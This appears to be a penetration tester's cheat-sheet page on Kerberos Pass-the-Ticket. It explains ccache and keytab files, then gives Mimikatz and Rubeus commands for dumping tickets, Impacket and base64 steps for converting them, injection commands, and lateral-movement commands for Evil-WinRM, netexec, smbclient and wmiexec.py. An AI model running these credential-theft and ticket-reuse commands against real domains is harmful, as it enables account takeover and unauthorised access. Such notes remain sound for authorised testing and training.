💥Cyb3rBook

PASS THE TICKET

4 min read

PRIMARY CATEGORY → KERBEROS

Theory

CCache

On Domain-Joined Linux Machines, the sensivite information related to an active Logon Session is not stored in the LSASS.exe’s memory space, as occurs in Windows

In this case, kerberos tickets and encryption keys are stored on the file system instead of in memory, in the following type of files →

Kerberos Credential Cache

Temporal file which stores Kerberos Credentials related to a Kerberos Principal, usually a user account

it stores →

  • Ticket Granting Ticket (TGT)
  • Ticket Granting Service (TGS)

it allows a client to authenticate to other Domain-related Services using the TGT stored in this file, without having to provide the password again

it is usually stored in /tmp

To list the content of this file →

klist -c <ccache_file>

In order to use a Credential Cache file, its path must be specified in the KRB5CCNAME environment parameter

Keytab

Kerberos Key Table

It contains Kerberos’ Key/Principal pairs

It stores all the Kerberos Encryption Keys

  • NTLM Hash
  • AES-128
  • AES-256

Note that the above keys are derived from the User’s password

To list information about a Keytab File

klist -k -t <keytab_file>
Identifying a Domain-Joined Linux Machine
Realm
command -V realm &> /dev/null && realm list
Pgrep
pgrep --full --list-full -- 'winbind|sssd'

Harvesting Kerberos Tickets

Mimikatz

Mimikatz

All Kerberos Tickets on the System

Elevated Privileges needed as sekurlsa module is used

  • Export Kerberos Tickets to .KIRBI Files
mimikatz.exe 'privilege::debug' 'token::elevate' 'sekurlsa::tickets /export' exit
  • Export Kerberos Tickets to Base64 Format
mimikatz.exe 'privilege::debug' 'token::elevate' 'standard::base64 /output:true' 'sekurlsa::tickets /export' exit
All Kerberos Tickets on the Current Session

Elevated Privileges not needed as the kerberos module allow to play with official Microsoft Kerberos API

  • Export Kerberos Tickets to Base64 Format
mimikatz.exe 'standard::base64 /output:true' 'kerberos::list /export' exit
Rubeus

Rubeus

TGTs and TGSs (All Kerberos Tickets)

If executed from a privileged context, all Kerberos Tickets on the System are listed. Otherwise, only those in the current session are listed

rubeus.exe dump /nowrap
All TGTs on the System

Elevated privilege needed

rubeus.exe dump /service:krbtgt /nowrap

Ticket Conversion

CCache → Kirbi
ticketConverter.py - Impacket

ticketConverter.py

ticketConverter.py <CCACHE> <KIRBI>
Kirbi → CCache
ticketConverter.py - Impacket

ticketConverter.py

ticketConverter.py <KIRBI> <CCACHE>
Kirbi → Base64
Base64

Linux 🐧

base64 -w 0 -- <KIRBI>
[Convert]::ToBase64String

Windows (PS) 🪟

[Convert]::ToBase64String([IO.File]::ReadAllBytes("<KIRBI>"))

Ticket Injection - Linux

KRB5CCNAME

The only thing we need in order to perform a Pass the Ticket on a Linux Machine is a Credential Cache file that we have Read Permissions again

So we could import that Credential Cache into our current session →

export KRB5CCNAME=<CCACHE_FILE>

And check it as follows →

klist

From that, we can perform Pass the Ticket using tools that support Kerberos Authentication as indicated here

Ticket Injection - Windows

Logon Session Types

Mimikatz

Mimikatz

Current LUID

No Elevated Privileges needed, kerberos module used

mimikatz.exe 'kerberos::ptt "<KIRBI_FILE>"' exit # KIRBI's Full Path
Another LUID

No Elevated Privileges needed, kerberos module used

  • Logon Session Type 9 (NewCredentials) creation with Dummy Credentials

Runas

runas.exe /netonly /user:<USERNAME> cmd.exe # Or Powershell.exe
  • Ticket Injection into the created Logon Session
mimikatz.exe 'kerberos::ptt "<KIRBI_FILE>"' exit # KIRBI's Full Path
Rubeus
.KIRBI
rubeus ptt /ticket:<KIRBI>
Base64 String
rubeus ptt /ticket:<BASE64_STRING>

Passing the Ticket

Setup

As mentioned, an attacker can forge some Kerberos Tickets without the need to harvesting them from Credential Cache files

This could be done if the Kerberos Encryption Keys (EKeys) of a given Kerberos Principal are grabbed from somewhere

First, simply install the following package in your attacking host

apt install -y -- krb5-user

In order to correctly contact with the Domain Controller (DC) of a given domain, some parameters must be specified in the following configuration file

/etc/krb5.conf

Configuration Parameters →

[libdefaults]
        default_realm = <DOMAIN.TLD>
 
...SNIP...
 
[realms]
    <DOMAIN.TLD> = {
        kdc = <DC01.DDD>
    }
 
...SNIP...

The above directives are necessary since some tools take this file as a reference, such as Evil-WinRM

This package also provides us with tools such as klist or kinit

Evil-WinRM

Evil-WinRM

ImportantSee this

evil-winrm --ip <TARGET> --realm <REALM>
Netexec

Netexec

netexec <PROTOCOL> <TARGET> --use-kcache
Smbclient
smbclient --use-kerberos=required --no-pass --list <TARGET>
Impacket
Smbclient.py

SMBClient.py

smbclient.py -k -no-pass <TARGET>
WMIExec.py

WMIExec.py

wmiexec.py -k -no-pass <TARGET>
PSExec.py

PSExec.py

Graph View

Backlinks